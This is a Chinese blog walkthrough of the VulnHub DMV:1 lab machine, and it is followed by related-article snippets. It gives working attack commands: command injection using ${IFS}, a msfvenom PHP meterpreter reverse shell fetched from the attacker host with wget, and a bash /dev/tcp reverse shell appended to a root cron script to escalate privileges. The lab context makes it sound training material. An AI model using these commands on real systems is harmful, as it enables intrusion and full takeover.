VulnHub DMV:1

最新推荐文章于 2024-09-09 10:02:28 发布
最新推荐文章于 2024-09-09 10:02:28 发布
阅读量294 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JC_xxx/article/details/108877636
本文详述了一次针对靶机的渗透测试过程,包括利用nmap扫描发现开放端口,通过HTTP服务的命令执行漏洞,使用Burp Suite分析请求,构造Meterpreter后门,并通过反弹shell与权限提升技术最终获取root权限,找到了flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DMV:1靶机下载地址:https://www.vulnhub.com/entry/dmv-1,462/
环境:靶机在VirtualBox中,用的是 VirtualBox Host-Only网卡,ip:192.168.56.111
在这里插入图片描述
攻击机 kali在VMware中,使用桥接模式,桥接至VirtualBox Host-Only网卡,ip:192.168.56.112
在这里插入图片描述
nmap 扫描发现靶机
在这里插入图片描述
nmap 扫描主机端口及其对应的服务,这里开放了22(ssh)和80(http)
在这里插入图片描述
访问http://192.168.56.111/ 发现这里存在输入框尝试使用burp抓包分析
在这里插入图片描述
存在可控变量yt_url
在这里插入图片描述
经过测试发现有命令执行,whoami命令被成功执行
在这里插入图片描述
但是这里空格被过滤了
在这里插入图片描述
空格绕过的方法很多,这里利用${IFS}替代空格进行绕过
在这里插入图片描述
既然存在命令执行,可以想到是否可以利用wget直接将木马下载至靶机
测试发现wget可以使用
在这里插入图片描述
使用msfenom构造Meterpreter后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.112 LPORT=777 -f raw > shell.php

在这里插入图片描述
在msf中配置相关选项

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.112
set port 777
run -j

在这里插入图片描述
利用python3在本地开启http服务

python3 -m http.server 8888

在这里插入图片描述
利用wget下载meterpreter后门

;wget${IFS}http://192.168.56.112:8888/shell.php;

在这里插入图片描述
下载成功
在这里插入图片描述
触发后门

;curl${IFS} http://192.168.56.111/shell.php;

在这里插入图片描述
msf这边也成功创建session
在这里插入图片描述
利用python获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
进入admin目录找到flag.txt
在这里插入图片描述
whoami查看用户为www-data
在这里插入图片描述
进入tmp目录 运行./clean.sh 权限不足
在这里插入图片描述
在本地开启nc

nc -lvvp 2333

在之前或获取的靶机shell中运行以下命令

echo bash -c 'bash -i >& /dev/tcp/192.168.56.112/2333 0>&1' >> clean.sh

接着./clean.sh运行,会发现依旧权限不足
在这里插入图片描述
回到本地已经成功反弹shell,查看权限为root,继续利用python获得交互式shell
在这里插入图片描述
查看最后的flag在/root/root.txt
在这里插入图片描述

JC_xxx
关注
dmv-checker:DMV CA检查器脚本
05-01
DMV约会检查器 如何使用 a@b:~/tools/dmv$ ./check.sh | grep -B2 July 903 West C Street ALTURAS, CA Monday, July 9, 2018 at 2:30 PM -- 430 South Broadway BLYTHE, CA Monday, July 16, 2018 at 10:20 AM ...
DMV-Online-Highscores-JPN:我的DMV在线高分系统的日语翻译
05-12
DMV-Online-Highscores-JPN:我的DMV在线高分系统日语翻译详解》 DMV-Online-Highscores-JPN是一个基于JavaScript技术构建的在线高分系统,其主要目的是为用户提供一个记录和展示驾驶考试成绩的平台。这个项目是...
VulnHub DMV:1 Writeup
末初 · mochu7
09-29 658
DMV:1详情见:https://www.vulnhub.com/entry/dmv-1,462/ 靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.104 攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 扫描C段内存活主机 arp-scan -l or nmap -sP 192.168.56.1/24 Nmap扫描目标IP,收集信息 nmap -A -Pn -
vulnhub靶机DMV
Keepb1ue的博客
10-09 3682
靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/dmv-1,462/ 靶机DMV (VirtualBox) IP:192.168.56.112 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有详细的靶机说明,而DMV需要寻找的flag总数为2个。 靶机环境配置:靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBoxHost-only网卡,保证无干扰目标。 确定目标ip: 确定目标ip,这里我使用net
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 5833
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vulnhub系列】Acid
大方子
11-28 1618
下载连接:https://download.vulnhub.com/acid/Acid.rar 靶机说明 Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors. 欢迎来到酸的世界。童话故事需要使用秘密钥匙打开魔法门。 目标 获得root权限和flag。 运行环境 ...
vulhub-DMV:1
2201_75378806的博客
05-14 241
echo "chmod u+s /usr/bin/find" >> clean.sh 过一段时间执行。在检查 Github 链接时,我们发现了有关此 Web 应用程序可以接受哪些命令句柄的选项。或者直接上传一个.sh文件后,利用命令执行直接执行文件,反弹shell也可以。测试框中粘贴随机的 YouTube URL 后,我们点击转换按钮。,无奈使用php弹了一个shell到攻击机上,发现可以运行成功。直接写入反弹shell,kali监听,等待一会就提权了。可以用用其他方式绕过,比如。单击拦截并将其打开。
论文 3DMV: Joint 3D-Multi-View Prediction for 3D Semantic Scene Segmentation
sinat_26871259的博客
10-30 1054
Dataset: ScanNet 获取方式: 签署协议书(http://dovahkiin.stanford.edu/scannet-public/ScanNet_TOS.pdf)后发送至邮箱:[email protected] Data Organization <scanId> |-- <scanId>.sens RGB-D sensor...
DMV:基于Node.js和WebRTC的实时图像捕捉工具
gitblog_00227的博客
09-09 389
DMV:基于Node.js和WebRTC的实时图像捕捉工具 项目介绍 DMV 是一个基于Node.js和WebRTC技术的开源项目,旨在提供一个简单易用的图像捕捉工具。通过DMV,用户可以利用摄像头在浏览器中实时捕捉图像,并将图像上传至服务器进行保存。DMV支持多种现代浏览器,包括Google Chrome Canary、Opera和Opera Mobile 12,确保了广泛的兼容性。 项目技术分...
[ECCV'18]3DMV:联合3D多视图预测3D语义场景分割_Python_下载.zip
04-30
1. 数据集:项目可能包含预处理好的训练和测试数据集,这些数据集通常由多视图图像和对应的3D点云标签组成。 2. 模型定义:3DMV的网络架构详细描述,可能在`.py`文件中,包括输入层、卷积层、池化层以及损失函数等。...
dmv-advisor:智能推荐DMV服务时间地点,节省您的等待时间
资源摘要信息:"dmv-advisor:不要浪费时间排队" 知识点一:DMV位置与历史数据分析 DMV(Department of Motor Vehicles,机动车辆管理部)是负责车辆注册、驾照发放及管理的政府机构。在很多国家和地区,DMV的办事...
ca-license-plates:加州DMV的虚荣车牌申请
04-23
applications.csv是加利福尼亚DMV从2015-2016年收到的23,463个个性化车牌应用程序的CSV文件。 这些并不代表DMV在该时间段内收到的所有申请,仅代表标记为由审核委员会进行进一步审核的申请。 该文件包括以下列: ...
supervisor-4.2.2-1.el8.tar.gz
最新发布
08-16
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
运用强化学习技术实现自动驾驶智能车在简化世界有限时间内高效抵达目的地
08-16
资源下载链接为: https://pan.quark.cn/s/1aee9b26d465 运用强化学习技术实现自动驾驶智能车在简化世界有限时间内高效抵达目的地(最新、最全版本!打开链接下载即可用!)
stc8时间片轮询模板
08-16
stc8工程,stc8时间片轮询模板
【增强现实技术】基于ARKit和SceneKit的iOS AR应用开发:实现平面检测与3D物体交互功能
08-16
内容概要:本文档提供了一个基于iOS平台的增强现实(AR)应用程序示例,该应用利用了ARKit和SceneKit框架。程序的主要功能是在检测到的水平平面上放置3D物体(如球体),并且可以通过点击屏幕来触发物体的放置。程序中详细展示了如何配置AR会话、处理平面检测、响应用户交互以及管理AR会话的状态变化(如会话失败、中断等)。此外,还介绍了自定义平面节点的创建方法,包括设置平面的可视化效果和物理属性,确保放置的物体能够在平面上正确显示和互动。; 适合人群:对iOS开发有一定了解,尤其是对ARKit和SceneKit有初步认识的开发者。; 使用场景及目标:①学习如何在iOS平台上使用ARKit和SceneKit创建基本的AR应用;②掌握平面检测、物体放置、用户交互处理等核心功能的实现;③理解AR会话的管理和状态变化处理机制。; 其他说明:此示例代码为初学者提供了完整的项目结构和功能实现,建议开发者在实际开发中根据需求进行扩展和优化。同时,注意结合官方文档深入理解各个API的具体用法。
JAVA语言考试系统的设计与实现(论文+源代码+文献综述+外文翻译+开题报告)
08-16
java
机动车驾驶员网络学习平台自动刷在线学时
08-16
资源下载链接为: https://pan.quark.cn/s/0bf65096976f 机动车驾驶员网络学习平台自动刷在线学时(最新、最全版本!打开链接下载即可用!)
与自动驾驶技术相关的代码集合
08-16
资源下载链接为: https://pan.quark.cn/s/a4f22996d175 与自动驾驶技术相关的代码集合(最新、最全版本!打开链接下载即可用!)
Delta DMV1000技术手册:机器视觉系统详解
在手册的第1章“组件和规格”中,详细列出了包装和可选部件,包括控制器包装、相机(可选第二个相机)、镜头(可选)和LED光源。这些组件是构建高效视觉检测系统的基础。 控制器单元是系统的核心部分,其规格详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值